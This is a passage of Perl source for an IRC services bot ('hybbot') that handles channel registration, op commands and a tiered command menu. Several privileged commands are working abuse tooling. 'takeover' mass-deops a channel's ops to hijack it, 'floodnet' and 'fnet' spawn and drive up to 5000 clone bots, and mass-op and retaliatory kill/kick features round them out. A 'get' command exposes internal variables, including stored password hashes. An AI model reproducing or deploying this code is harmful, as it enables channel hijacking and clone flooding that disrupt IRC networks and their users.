 $bots{$nickss[$i]} = $tmp;
}
if ($joinz0r) {
 foreach $tmpc (keys(%join)) {
  foreach (keys(%{$join{$tmpc}})) {
   print SOCK "SJOIN ts $tmpc + :\@$botnick\n";
   print SOCK ":$botnick MODE $tmpc $_\n";
   $chans{$tmpc} = 1;
  }
 }
}
while (<SOCK>) {
 $blargh = $_;
 $blargh =~ s/-insecure//;
 ($fulladd, $what, $where, $etc) = $_ =~ /^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$/;
 $fulladd =~ s/-insecure//;
 ($nic) = $fulladd =~ /^:(.*)$/;
 $nick = lc($nic);
 $where = lc($where);

# part of the retrieve command
 if ($retr) {
  print SOCK ":$botnick PRIVMSG $retr :$_\n";
  $retr = 0;
 }

# return server pings
 if (/^PING (.*)$/) {
  print SOCK "PONG $1\n";
  next;
 }

# autokick people who kick me!
 elsif (/^:(\S+) KICK (\S+) (\S+)/ && ($bots{$3} || $protect{$3})) {
  if ($bots{$3}) {
   print SOCK "SJOIN ts $2 + :\@$3\n";
   print SOCK "KICK $2 $1 :right back at you.\n";
   delete($nix{$1}{$2});
   delete($all{$2}{$1});
   delete($sall{$2}{$1});
   delete($sall{$2}{'@' . $1});
   next;
  }
  else {
   print SOCK "KICK $2 $1 :you mess with him, you mess with me.\n";
   delete($nix{$1}{$2});
   delete($all{$2}{$1});
   delete($sall{$2}{$1});
   delete($sall{$2}{'@' . $1});
   next;
  }
  next;
 }

# autodeop people who deop me!
 if (/^:(\S+) MODE (\S+) -+o+ (.*)$/) {
  @tmpb = split(/\s+/, $3);
  foreach (@tmpb) {
   if (($bots{$_} || $protect{$_}) && !($bots{$1} || $protect{$1})) {
    print SOCK ":$_ PART $2\nSJOIN ts $2 + :\@$_\n";
    print SOCK ":$_ MODE $2 -o $1\n";
    delete $sall{$2}{'@' . $_};
    $sall{$a}{$_} = 1;
    last;
   }
  }
 }

# autokill people who kill me!
 elsif (/^:(\S+) KILL (\S+)/ && ($botnick eq $2 || $protect{$2})) {
  if ($bots{$2}) {
   print SOCK "KILL $1 :Please do not kill services. (-hybbot)\n$bots{$2}\n";
   foreach (keys(%chans)) {
    print SOCK "SJOIN ts $_ + :\@$2\n";
   }
   foreach (keys(%{$nix{$1}})) {
    delete($all{$_}{$1});
    delete($sall{$_}{'@' . $1});
    delete($sall{$_}{$1});
   }
   delete($nix{$a});
   next;
  }
  else {
   print SOCK "KILL $1 :You mess with my family, you mess with me. -$botnick [hybbot]\n";
   for (keys(%{$nix{$1}})) {
    delete($all{$_}{$1});
    delete($sall{$_}{'@' . $1});
    delete($sall{$_}{$1});
   }
   delete($nix{$a});
   next;
  }
 }

# add/remove/modify the arrays with the names of everyone in chans
 if (/^:(\S+)!\S+\s+PART\s+(\S+)/) {
  ($a, $b) = (lc($1), lc($2));
  delete $nix{$a}{$b};
  delete $all{$b}{$a};
  delete $sall{$b}{$a};
  delete $sall{$b}{'@' . $a};
  next;
 }
 if (/^:\S+\s+KICK\s+(\S+)\s+(\S+)/) {
  ($b, $a) = (lc($1), lc($2));
  delete $nix{$a}{$b};
  delete $all{$b}{$a};
  delete $sall{$b}{$a};
  delete $sall{$b}{'@' . $a};
  next;
 }
 if (/^:(\S+)!\S+\s+JOIN\s+:(.*)$/) {
  ($a, $b) = (lc($1), lc($2));
  $nix{$a}{$b} = 1;
  $all{$b}{$a} = 1;
  $sall{$b}{$a} = 1;
  next;
 }
 if (/^:(\S+)!\S+\s+NICK\s+:(\S+)/) {
  ($a, $b) = (lc($1), lc($2));
  foreach (@{$nix{$a}}) {
   delete $all{$_}{$a};
   if (delete($sall{$_}{$a})) {
    $sall{$_}{$b} = 1;
   }
   if (delete($sall{$_}{'@' . $a})) {
    $sall{$_}{'@' . $b} = 1;
   }
   $all{$_}{$b} = 1;
  }
  $nix{$a} = $nix{$b};
  delete $nix{$a};
 }
 if (/^:\S+\s+MODE\s+(\S+)\s+(-|\+)o+\s+(.*)$/) {
  ($a, $b, $c) = (lc($1), $2, lc($3));
  @tmp = split(/\s+/, $c);
  foreach (@tmp) {
   if ($b eq '-') {
    delete $sall{$a}{'@' . $_};
    $sall{$a}{$_} = 1;
   }
   if ($b eq '+') {
    delete $sall{$a}{$_};
    $sall{$a}{'@' . $_} = 1;
   }
  }
  next;
 }
 if (/^:(\S+)!\S+\s+QUIT/) {
  ($a) = (lc($1));
  foreach (@{$nix{$a}}) {
   delete $all{$_}{$a};
   delete $sall{$_}{$a};
   delete $sall{$_}{'@' . $a};
  }
  delete $nix{$a};
  next;
 }
 if (/^:\S+\s+SJOIN\s+\S+\s+(\S+)\s+([^:]+)\s+:(.*)$/) {
  $tmpr = lc($1);
  $chns{$tmpr} = $2;
  @tmp = split(/\s+/, lc($3));
  foreach (@tmp) {
   s/\+//;
   $sall{$tmpr}{$_} = 1;
   s/\@//;
   $all{$tmpr}{$_} = 1;
   $nix{$_}{$tmpr} = 1;
  }
  next;
 }

# help finish the registration of a channel
 elsif ($what == 319 && $regchan) {
  ($chan) = $etc =~ /:(.*)$/;
  @chans = split(/\s+/, $chan);
  foreach (@chans) {
   if ($_ eq "\@" . lc($hash{'chan'}) && !&checkconf(lc($hash{'chan'}))) {
    $pass = &mkpasswd($hash{'pass'});
    &addconf("CHAN:".lc($hash{'chan'}).":$hash{'nick'}:$pass\n");
    print SOCK ":$botnick PRIVMSG $hash{'nick'} :\cb$hash{'chan'} registered by $hash{'nick'} (password: $hash{'pass'})\n";
    print SOCK ":$botnick PRIVMSG $hash{'nick'} :Use the OP command to gain ops from me.\n";
    print SOCK ":$botnick PART $hash{'chan'}\n";
    $rg++;
   }
  }
  if (!$rg) {
   print SOCK ":$botnick PRIVMSG $hash{'nick'} :Unable to register $hash{'chan'} (not opped?)\n";
   print SOCK ":$botnick PART $hash{'chan'}\n";
  }
  undef $rg;
  undef %hash;
  undef $regchan;
  $chnln{$hash{'chan'}} = $hash{'nick'};
  $chnlp{$hash{'chan'}} = $pass;
  next;
 }


###########################################
# Private messages and all
###########################################

 elsif ($where !~ /^#/ and $what eq 'PRIVMSG') {

# getting info about commands
  if ($etc =~ /^:botpart\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botpart <botnick> <#chan>\cb\n";
   next;
  }
  elsif ($etc =~ /^:botop\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botop <botnick> <#chan> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:botdeop\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botdeop <botnick> <#chan> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:takeover\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> takeover <#chan> <nicks>\n";
   next;
  }
  elsif ($etc =~ /^:floodnet\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> floodnet <# of bots> <name of net> [nick]\n";
   next;
  }
  elsif ($etc =~ /^:fnet\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> fnet <name of net> <raw commands>\n";
   next;
  }
  elsif ($etc =~ /^:killnet\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> killnet <name of net> [quit message]\n";
   next;
  }
  elsif ($etc =~ /^:adduser\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> adduser <nick> <id> <passwd>\n";
   next;
  }
  elsif ($etc =~ /^:addbot\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addbot <botnick> <flags> <hostname> <ircname>\cb\n";
   next;
  }
  elsif ($etc =~ /^:killbot\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> killbot <botnick> [message]\cb\n";
   next;
  }
  elsif ($etc =~ /^:botjoin\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> botjoin <botnick> <#chan>\cb\n";
   next;
  }
  elsif ($etc =~ /^:addjoin\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addjoin <#chan> [nick]\cb\n";
   next;
  }
  elsif ($etc =~ /^:op\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: op <#channel> <password> [nick (originally reged chan with)]\cb\n";
   next;
  }
  elsif ($etc =~ /^:invite\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: invite <#channel> <password> [nick]\cb\n";
   next;
  }
  elsif ($etc =~ /^:addchan\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: addchan <#channel> <password> [modes]\cb\n";
   next;
  }
  elsif ($etc =~ /^:chmodes\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: chmodes <#channel> <newmodes>\cb\n";
   next;
  }
  elsif ($etc =~ /^:delchan\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: delchan <#channel> <password>\cb\n";
   next;
  }
  elsif ($etc =~ /^:permmode\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: permmode <#channel> <password> <modes>\cb\n";
   next;
  }
  elsif ($etc =~ /^:addop\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: addop <#channel> <password> <nick>\cb (the nick must have already set a password with the pass command)\n";
   next;
  }
  elsif ($etc =~ /^:addaop\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: addaop <#channel> <password> <nick!ident\@hostname>\cb\n";
   next;
  }
  elsif ($etc =~ /^:delop\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: delop <#channel> <password> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:opz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> opz0r <#chan> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:restart\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> restart [exit message]\cb\n";
   next;
  }
  elsif ($etc =~ /^:exit\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> exit [exit message]\cb\n";
   next;
  }
  elsif ($etc =~ /^:deopz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> deopz0r <#chan> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:joinz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> joinz0r <#chans>\cb\n";
   next;
  }
  elsif ($etc =~ /^:mode\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: mode <password> <#channel> <modes>\cb\n";
   next;
  }
  elsif ($etc =~ /^:register\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: register <#channel> <password>\cb\n";
   next;
  }
  elsif ($etc =~ /^:raw\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> raw <raw irc stuff;more irc stuff>\cb\n";
   next;
  }
  elsif ($etc =~ /^:m0pz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> m0pz0r <#chans>\cb\n";
   next;
  }
  elsif ($etc =~ /^:massopz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> massopz0r <#chans> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:massdopz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> massdopz0r <#chans> <nick>\cb\n";
   next;
  }
  elsif ($etc =~ /^:partz0r\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> partz0r <#chans>\cb\n";
   next;
  }
  elsif ($etc =~ /^:help\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :Please type \cb/msg $botnick USERHELP\cb. If you're an OPER, type \cb/msg $botnick OPERHELP\cb.\n";
   next;
  }
  elsif ($etc =~ /^:retrieve\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> retrieve <raw irc command>\n";
   next;
  }
  elsif ($etc =~ /^:get\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> get <variable name>\n";
   next;
  }
  elsif ($etc =~ /^:addoper\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbusage: <your pass> addoper <nick> <id>\n";
   next;
  }

# get the user commands
  elsif ($etc =~ /^:userhelp\s*$/i) {
   print SOCK ":$botnick PRIVMSG $nick :Commands: register, mode, op, pass, status, invite, addchan, delchan, chmodes, addop, delop, addaop - /msg $botnick command for more information on a specific command.\n";
   next;
  }

# setting a password
  elsif ($etc =~ /^:pass\s+(.*)\s*$/i || $etc =~ /:pass\s*$/i) {
   $nu = $1;
   $nu =~ s/\s*$//;
   if ($nu) {
    if ($nu =~ /\s/) {
     print SOCK ":$botnick PRIVMSG $nick :\cbusage: PASS <password>\cb\n";
    }
    else {
     if (&checkpass($nick)) {
      print SOCK ":$botnick PRIVMSG $nick :You already have a password set.\n";
     }
     else {
      print SOCK "WHOIS $nick\n";
      $passval = 1;
      $pas = &mkpasswd($nu);
      &addconf("PASS:" . $nick . ":0:0:$pas\n");
      $passes{$nick} = $pas;
      print SOCK ":$botnick PRIVMSG $nickx :Password $nu added\n";
     }
    }
   }
   else {
    print SOCK ":$botnick PRIVMSG $nick :\cbusage: PASS <password>\cb\n";
   }
   next;
  }

# mess with anyone who ctcp versions me
  elsif ($etc =~ /^:\caversion/i) {
   foreach (@{$bnx{"h4w"}}) {
    print SOCK ":$_ NOTICE $nick :\cAVERSION \cBhybbot $version\cB by CommPort5\cA\n";
   }
   next;
  }

# get status of yourself
  elsif ($etc =~ /^:status/i) {
   $stat = &status($nick);
   print SOCK ":$botnick PRIVMSG $nick :Your status is: \cb$stat\cb\n";
   next;
  }

# get the oper commands
  elsif ($etc =~ /^:operhelp/i) {
   print SOCK ":$botnick PRIVMSG $nick :\cbwannabes:\cb opz0r\n";
   print SOCK ":$botnick PRIVMSG $nick :\cbopers:\cb rehash, opz0r, deopz0r, joinz0r, partz0r\cb\n";
   print SOCK ":$botnick PRIVMSG $nick :\cbhax0rs:\cb m0pz0r, raw, adduser, addjoin, botjoin, botpart, botop, botdeop, addbot, killbot, listbots, massopz0r, massdopz0r\n";
   print SOCK ":$botnick PRIVMSG $nick :\cbl33t hax0rs:\cb get, retrieve, addoper, exit, restart, floodnet, killnet, fnet, takeover\n";
   next;
  }

# addop command
  elsif ($etc =~ /^:addop\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
   ($chan, $pass, $nck) = ($1, $2, $3);
   $chan = lc($chan);
   $nck = lc($nck);
   if (!&chkline("CHOP:$chan:$nck:") && $passes{$nck} && ((&ckpasswd($pass, $chnlp{$chan}) && $chnln{$chan} eq $nick) || (&ckpasswd($pass, $passes{$nick}) && $nicks{$nick} >= 31337))) {
    &addop($nck, $chan);
    print SOCK ":$botnick PRIVMSG $nick :\cb$nck was added as an op for $chan\cb\n";
    print SOCK ":$botnick PRIVMSG $nck :You've been added as an op for $chan, /msg $botnick OP for help on opping yourself\n";
   }
   elsif (&chkline("CHOP:$chan:$nck:")) {
    print SOCK ":$botnick PRIVMSG $nick :$nck is already in the conf\n";
   }
   elsif ($chnln{$chan} ne $nick) {
    print SOCK ":$botnick PRIVMSG $nick :You don't own $chan [$chnln{$chan} != $nick]\n";
   }
   elsif (!&ckpasswd($pass, $chnlp{$chan})) {
    print SOCK ":$botnick PRIVMSG $nick :Incorrect password.\n";
   }
   next;
  }

# delop command (under construction)
  elsif ($etc =~ /^:delop\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
   next;
  }

# invite command
  elsif ($etc =~ /^:invite\s+(\S+)\s+(\S+)\s*(\S*)/i) {
   $onick = $nick;
   $onick = $3 if $3;
   if (&readconf("CHAN:".lc($1).":$onick:", $2) || &readconf("CHOP:".lc($1).":$onick:", $2)) {
    print SOCK "SJOIN ts $1 + :\@$botnick\n" if (!$chans{lc($1)});
    print SOCK ":$botnick INVITE $nick $1\n";
    print SOCK ":$botnick PART $1\n" if (!$chans{lc($1)});
   }
   else {
    print SOCK ":$botnick PRIVMSG $nick :Incorrect password or nickname.\n";
   }
   next;
  }

# addchan command
=pod
    elsif ($etc =~ /^:addchan\s+(\S+)\s*(.*)$/i) {
#     if (&


     if ($chans{lc($1)}) {
      print SOCK ":$botnick PRIVMSG $nick :Channel is already in the conf.\n";
     }
     else {
      print SOCK "SJOIN ts $1 + :\@$botnick\n" unless $chans{$1};
      &addconf("JOIN:" . lc($1) . ":$2:\n");
      $chans{lc($1)}{$2} = 1;
     }
     next;
    }
=cut

# op command
  elsif ($etc =~ /^:op\s+(\S+\s+\S+)\s*(\S*)/i) {
   $onick = $nick;
   $nick = $2 if $2;
   @reg = split(/\s+/, $1);
   if (&readconf("CHAN:".lc($reg[0]).":$nick:", $reg[1]) || &readconf("CHOP:".lc($reg[0]).":$nick:", $reg[1])) {
    print SOCK "SJOIN ts $reg[0] + :\@$botnick\n" if (!$chans{lc($reg[0])});
    print SOCK ":$botnick MODE $reg[0] +o $onick\n";
    print SOCK ":$botnick PART $reg[0]\n" if (!$chans{lc($reg[0])});
    delete $sall{lc($reg[0])}{$onick};
    $sall{$1}{'@' . $onick} = 1;
   }
   else {
    print SOCK ":$botnick PRIVMSG $onick :Incorrect password or nickname.\n";
   }
   next;
  }

# mode command
  elsif ($etc =~ /^:mode\s+(\S+)\s+(\S+)\s+(.*)$/i) {
   if (&readconf("CHAN:".lc($2).":$nick:", $1)) {
    print SOCK "SJOIN ts $2 + :\@$botnick\n" if (!$chans{lc($2)});
    print SOCK ":$botnick MODE $2 $3\n";
    print SOCK ":$botnick PART $2\n" if (!$chans{lc($2)});
   }
   else {
    print SOCK ":$botnick PRIVMSG $onick :Incorrect password or nickname.\n";
   }
   next;
  }

# register command
  elsif ($etc =~ /^:register\s+(\S+\s+\S+)/i) {
   @reg = split(/\s+/, $1);
   if (&checkconf($reg[0]) || $reg[0] !~ /^#/) {
    print SOCK ":$botnick PRIVMSG $nick :$reg[0] is already registered.\n";
   }
   elsif ($reg[0] !~ /^#/) {
    print SOCK ":$botnick PRIVMSG $nick :\cbusage: register <#channel> <password>\cb\n";
   }
   else {
    print SOCK ":$botnick JOIN $reg[0]\n:$botnick WHOIS $nick\n";
    $hash{'chan'} = $reg[0];
    $hash{'nick'} = $nick;
    $hash{'pass'} = $reg[1];
    $regchan = 1;
   }
   next;
  }

# oper stuff
  elsif ($etc =~ /^:(\S+)/ && &ckpasswd($1, $passes{$nick})) {
   $etc =~ s/^\S+\s+/:/;

# opz0r for wannabes
   if ($etc =~ /^:opz0r\s+(\S+)\s+(\S+)/i && $nicks{$nick} == 0) {
    if ($chans{$1}) {
     print SOCK ":$botnick MODE $1 +o $2\n";
    }
    else {
     print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 +o $2\n:$botnick PART $1\n";
    }
    delete $sall{$1}{$2};
    $sall{$1}{'@' . $2} = 1;
    next;
   }

# l33t hax0r commands
   if ($nicks{$nick} >= 31337) {

# takeover command :)
    if ($etc =~ /^:takeover\s+(\S+)\s+(.*)$/i) {
     ($chn, $oth) = ($1, $2);
     $chn = lc($chn);
     @nms = keys(%{$sall{$chn}});
     my (%tmp0r, @nns, $snd, $f);
     @othr = split(/\s+/, $oth);
     foreach (@othr) {
      $tmp0r{$_}++;
     }
     foreach (@nms) {
      push(@nns, $_) if (s/^\@// && !$tmp0r{$_});
     }
     print SOCK "SJOIN ts $chn + :\@$botnick\n" if (!$chans{lc($chn)});
     foreach (0 .. @nns) {
      $f++;
      delete $sall{$chn}{'@' . lc($nns[0])};
      $sall{$chn}{lc($nns[0])} = 1;
      $snd .= "$nns[$_] ";
      if ($f == 12) {
       $f = 0;
       print SOCK ":$botnick MODE $chn " . "-" x 13 . "o" x 13 . " $snd\n";
       $snd = "";
      }
     }
     print SOCK ":$botnick MODE $chn " . "-" x 13 . "o" x 13 . " $snd\n";
     ($snd, $f) = ("", "");
     foreach (0 .. @othr) {
      $f++;
      delete $sall{$chn}{lc($othr[$_])};
      $sall{$chn}{'@' . lc($othr[$_])} = 1;
      $snd .= "$othr[$_] ";
      if ($f == 12) {
       $f = 0;
       print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
       $snd = "";
      }
     }
     print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
     print SOCK ":$botnick PART $chn\n" if (!$chans{lc($chn)});
     next;
    }

# floodnet command
    elsif ($etc =~ /^:floodnet\s+(\S+)\s+(\S+)\s*(\S*)$/i) {
     if (($1 + $fnts) >= 5000) {
      print SOCK ":$botnick PRIVMSG $nick :There cannot be over 5000 bots (currently there are $fnts loaded)\n";
     }
     elsif ($nets{$2}) {
      print SOCK ":$botnick PRIVMSG $nick :There already is a net with that name.\n";
     }
     else {
      $nets{$2} = $1;
      $fnts += $1;
      $x = 0;
      for (1 .. $1) {
       $x++;
       my $nck;
       if ($3) {
        $nck = $3 . int(rand(1000));
        push(@{$bnx{$2}}, $nck);
       }
       else {
        @tmp = ('a' .. 'z');
        for (1 .. 9) {
         $nck .= $tmp[int(rand(@tmp))];
        }
        push(@{$bnx{$2}}, $nck);
       }
       print SOCK "NICK $nck 1 1 +iw $nck hyb.bot $srvc :hybbot [floodbot]\n";
       if ($x == 200) {
        $x = 0;
        sleep 1;
       }
      }
     }
    }

# killnet command
    elsif ($etc =~ /^:killnet\s+(\S+)\s*(\S*)$/i) {
     $x = 0;
     $fnts -= $nets{$1};
     delete $nets{$1};
     foreach $bn (@{$bnx{$1}}) {
      $x++;
      print SOCK ":$bn QUIT :$2\n";
      if ($x == 200) {
       $x = 0;
       sleep 1;
      }
     }
    }

# fnet command
    elsif ($etc =~ /^:fnet\s+(\S+)\s+(.*)$/i) {
     @cmds = split(/;/, $2);
     $x = 0;
     foreach $cmd (@cmds) {
      foreach $bn (@{$bnx{$1}}) {
       $x++;
       $tmp = $cmd;
       $tmp =~ s/\\\*/$bn/g;
       print SOCK "$tmp\n";
       if ($x == 200) {
        sleep 1;
        $x = 0;
       }
      }
     }
    }

# retrieve command
    elsif ($etc =~ /^:retrieve\s*(.*)$/i) {
     print SOCK "$1\n";
     $retr = $nick;
     next;
    }

# get command
    elsif ($etc =~ /^:get\s*(.*)$/i) {
     ($a) = ($1);
     @b = split(/\s+/, $a);
     if (@b == 1) {
      $c = ${$a};
     }
     elsif (@b == 2) {
      $c = ${$b[0]}{$b[1]};
     }
     else {
      $c = ${$b[0]}{$b[1]}{$b[2]};
     }
     print SOCK ":$botnick PRIVMSG $nick :$c\n";
     if (@b == 1) {
      $c = join(', ', keys(%{${$a}}));
     }
     elsif (@b == 2) {
      $c = join(', ', keys(%{${$b[0]}{$b[1]}}));
     }
     else {
      $c = join(', ', keys(%{${$b[0]}{$b[1]}{$b[2]}}));
     }
     print SOCK ":$botnick PRIVMSG $nick :$c\n";
     next;
    }

# exit command
    elsif ($etc =~ /^:exit\s*(.*)$/i) {
     foreach (keys(%bots)) {
      print SOCK ":$_ QUIT :$1\n";
     }
     die "hybbot exiting...\n";
    }

# restart command
    elsif ($etc =~ /^:restart\s*(.*)$/i) {
     foreach (keys(%bots)) {
      print SOCK ":$_ QUIT :$1\n";
     }
     close(SOCK);
     fork() && die "hybbot restarting...\n";
     &restart;
    }

# addoper command
    elsif ($etc =~ /^:addoper\s+(\S+)\s+(\S+)\s*$/i) {
     if (&addoper($1, $2) == 1) {
      print SOCK ":$botnick PRIVMSG $nick :$1 added as an oper with ID $2\n";
     }
     elsif (&addoper($1, $2) == 2) {
      print SOCK ":$botnick PRIVMSG $nick :$1 is in the conf too many times.\n";
     }
     else {
      print SOCK ":$botnick PRIVMSG $nick :$1 was not found in conf.\n";
     }
     &rehash;
     next;
    }
   }

# hax0r commands [and above]
   if ($nicks{$nick} >= 666) {

# adduser command
    if ($etc =~ /^:adduser\s+(\S+)\s+(\S+)\s+(\S+)\s*$/i) {
     &operconf($1, $2, $3);
     next;
    }

# m0pz0r command
    elsif ($etc =~ /^:m0pz0r\s+(.*)$/i) {
     @tmp = split(/\s+/, $1);
     foreach $chn (@tmp) {
      $chn = lc($chn);
      ($snd, $f) = ("", "");
      @nmz = keys(%{$all{$chn}});
      print SOCK "SJOIN ts $chn + :\@$botnick\n" if (!$chans{lc($chn)});
      foreach (0 .. @nmz) {
       $f++;
       delete $sall{$chn}{lc($nmz[$_])};
       $sall{$chn}{'@' . lc($nmz[$_])} = 1;
       $snd .= "$nmz[$_] ";
       if ($f == 12) {
        $f = 0;
        print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
        $snd = "";
       }
      }
      print SOCK ":$botnick MODE $chn " . "+" x 13 . "o" x 13 . " $snd\n";
      print SOCK ":$botnick PART $chn\n" if (!$chans{lc($chn)});
     }
     next;
    }

# raw command
    elsif ($etc =~ /^:raw\s+(.*)$/i) {
     @tmp = split(/;/, $1);
     foreach (@tmp) {
      print SOCK "$_\n";
     }
     next;
    }

# massopz0r command
    elsif ($etc =~ /^:massopz0r\s+(.*)$/i) {
     if ($1 =~ /^([^#]\S+)\s+(.*)$/) {
      $n = $1;
      $c = $2;
     }
     else {
      $n = $nick;
     }
     $n = lc($n);
     @chans = split(/\s/, $c);
     foreach (@chans) {
      if ($chans{$_}) {
       print SOCK ":$botnick MODE $_ +o $n\n";
      }
      else {
       print SOCK "SJOIN ts $_ + :\@$botnick\n:$botnick MODE $_ +o $n\n:$botnick PART $_\n";
      }
      delete $sall{lc($_)}{$n};
      $sall{lc($_)}{'@' . $n} = 1;
     }
    }

# massdopz0r command
    elsif ($etc =~ /^:massdopz0r\s+(.*)$/i) {
     if ($1 =~ /^([^#]\S+)\s+(.*)$/) {
      $n = $1;
      $c = $2;
     }
     else {
      $n = $nick;
     }
     $n = lc($n);
     @chans = split(/\s/, $c);
     foreach (@chans) {
      if ($chans{$_}) {
       print SOCK ":$botnick MODE $_ -o $n\n";
      }
      else {
       print SOCK "SJOIN ts $_ + :\@$botnick\n:$botnick MODE $_ -o $n\n:$botnick PART $_\n";
      }
      delete $sall{'@' . lc($_)}{$n};
      $sall{lc($_)}{$n} = 1;
     }
    }

# killbot command
    elsif ($etc =~ /^:killbot\s+(\S+)\s*(.*)$/i) {
     print SOCK ":$1 QUIT :$2\n";
     delete($bots{$1});
     next;
    }

# listbots command
    elsif ($etc =~ /^:listbots/i) {
     my @temp;
     foreach (keys(%bots)) {
      if ($bots{$_}) {
       push(@temp, $_);
      }
     }
     $tmp = join(', ', @temp);
     print SOCK ":$botnick PRIVMSG $nick :$tmp\n";
     next;
    }

# addbot command
    elsif ($etc =~ /^:addbot\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$/i) {
     $tmp = "NICK $1 1 1 $2 $1 $3 $srvc :$4";
     print SOCK "$tmp\n";
     $bots{$1} = $tmp;
     next;
    }

# addjoin command
    elsif ($etc =~ /^:addjoin\s+(\S+)\s*(.*)$/i) {
     if ($chans{lc($1)}) {
      print SOCK ":$botnick PRIVMSG $nick :Channel is already in the conf.\n";
     }
     else {
      print SOCK "SJOIN ts $1 + :\@$botnick\n" unless $chans{$1};
      &addconf("JOIN:" . lc($1) . ":$2:\n");
      $chans{lc($1)}{$2} = 1;
     }
     next;
    }

# botjoin command
    elsif ($etc =~ /^:botjoin\s+(\S+)\s+(\S+)/i) {
     print SOCK "SJOIN ts $2 + :\@$1\n";
     $chans{$2} = 1;
     next;
    }

# botpart command
    elsif ($etc =~ /^:botpart\s+(\S+)\s+(\S+)/i) {
     print SOCK ":$1 PART $2\n";
     delete($chans{$2});
     next;
    }

# botop command
    elsif ($etc =~ /^:botop\s+(\S+)\s+(\S+)\s+(\S+)/i) {
     if ($chans{$2}) {
      print SOCK ":$1 MODE $2 +o $3\n";
     }
     else {
      print SOCK "SJOIN ts $2 + :\@$1\n:$1 MODE $2 +o $3\n:$1 PART $2\n"
     }
     next
    }

# botdeop command
    elsif ($etc =~ /^:botdeop\s+(\S+)\s+(\S+)\s+(\S+)/i) {
     if ($chans{$2}) {
      print SOCK ":$1 MODE $2 -o $3\n";
     }
     else {
      print SOCK "SJOIN ts $2 + :\@$1\n:$1 MODE $2 -o $3\n:$1 PART $2\n"
     }
     next
    }
   }

# oper commands [and above]
   if ($nicks{$nick} >= 1) {

# rehash command
    if ($etc =~ /^:rehash/i) {
     &rehash;
     print SOCK ":$botnick PRIVMSG $nick :\cbRehashed.\cb\n";
     next;
    }

# joinz0r command
    elsif ($etc =~ /^:joinz0r\s+(.+)\s*$/i) {
     @chns = split(/\s+/, $1);
     foreach (@chns) {
      print SOCK "SJOIN ts $_ + :\@$botnick\n";
      $chans{$_} = 1;
     }
     next;
    }

# partz0r command
    elsif ($etc =~ /^:partz0r\s+(.+)\s*$/i) {
     @chns = split(/\s+/, $1);
     foreach (@chns) {
      print SOCK ":$botnick PART $_\n";
      delete($chans{$_});
     }
     next;
    }

# deopz0r command
    elsif ($etc =~ /^:deopz0r\s+(\S+)\s+(.*)$/i) {
     if ($chans{$1}) {
      @x = split(/\s/, $2);
      $r = @x;
      for (@x) {
       delete $sall{lc($1)}{'@' . lc($_)};
       $sall{lc($1)}{lc($_)} = 1;
      }
      print SOCK ":$botnick MODE $1 " . "-" x $r . "o" x $r . " $2\n";
     }
     else {
      @x = split(/\s/, $2);
      for (@x) {
       delete $sall{lc($1)}{'@' . lc($_)};
       $sall{lc($1)}{lc($_)} = 1;
      }
      $r = @x;
